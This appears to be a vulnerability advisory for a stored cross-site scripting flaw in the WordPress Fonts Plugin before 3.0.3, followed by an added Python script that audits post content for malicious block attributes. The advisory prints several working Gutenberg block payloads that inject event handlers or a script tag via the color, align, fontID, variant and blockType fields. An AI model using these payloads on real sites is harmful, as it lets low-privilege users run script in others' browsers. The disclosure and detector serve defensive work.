wpexploit / Apple502j / WPEX-ID:DD2B3F22-5E8B-41CF-BCB8-D2E673E1D21E
Aug 23, 2021 - 12:00 a.m.

Fonts Plugin < 3.0.3 - Contributor+ Stored Cross-Site Scripting

cross-site scripting
contributor
stored data
security vulnerability
exploit

EPSS: 0.001 (Percentile: 24.8%)

The plugin does not escape and sanitise some of its block settings, allowing users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks via the blockType (combined with content), align, color, variant and fontID arguments of a Gutenberg block.

As a contributor, put the following code in a post/page while in Code Editor mode:

< 3.0.2
<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","content":"Hello, World!","color":"red;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(1+origin)//"} /-->

<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","align":"center;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(2+origin)//","content":"Hello, World!"} /-->

<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"Arial;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(origin)//","variant":"400","content":"Hello, World!"} /-->

<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"Arial","variant":"400;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(/Variant/)//","content":"Hello, World!"} /-->

< 3.0.3
<!-- wp:olympus-google-fonts/google-fonts {"blockType":"script","fontID":"0","variant":"400","content":"alert(\u0022xss\u0022)"} /-->
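For sites that ran an affected version, the following added example (not part of the original advisory and not the plugin's code) audits stored post content for this block and flags attribute values shaped like the ones above. The tag allowlist, the delimiter rule and the sample post body are assumptions made for this sketch.

```python
import json
import re

# Block name and attribute names come from the advisory; the allowlist and the
# character rule below are assumptions for this audit, not the plugin's logic.
BLOCK_RE = re.compile(
    r"<!--\s*wp:olympus-google-fonts/google-fonts\s+(\{.*?\})\s*/?-->", re.S)
ALLOWED_TAGS = {"p", "h1", "h2", "h3", "h4", "h5", "h6", "span", "div"}  # assumed
STYLE_FIELDS = ("align", "color", "variant", "fontID")
# Characters that let a value leave a CSS declaration or an HTML attribute.
BREAKOUT = re.compile(r"""["'<>;(){}\\]""")


def audit_post(post_content):
    """Return (block_index, field, reason) findings for one post body."""
    findings = []
    for idx, match in enumerate(BLOCK_RE.finditer(post_content)):
        try:
            attrs = json.loads(match.group(1))
        except json.JSONDecodeError:
            findings.append((idx, "*", "unparseable block attributes"))
            continue
        tag = attrs.get("blockType")
        if tag is not None and str(tag).lower() not in ALLOWED_TAGS:
            findings.append((idx, "blockType", f"tag {tag!r} not in allowlist"))
        for field in STYLE_FIELDS:
            value = attrs.get(field)
            if value is not None and BREAKOUT.search(str(value)):
                findings.append((idx, field, "value contains markup or CSS delimiter"))
    return findings


# Constructed post body: one benign block, then two shaped like the advisory's cases.
SAMPLE = "\n".join([
    '<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","color":"#ff0000","content":"Hello"} /-->',
    '<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","color":"red;x:y\\u0022 onanimationend=\\u0022","content":"Hello"} /-->',
    '<!-- wp:olympus-google-fonts/google-fonts {"blockType":"script","fontID":"0","variant":"400","content":"x"} /-->',
])

if __name__ == "__main__":
    for finding in audit_post(SAMPLE):
        print(finding)
```

Run it over each post_content value exported from the database; a finding marks a post to review, and updating the plugin is still required.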
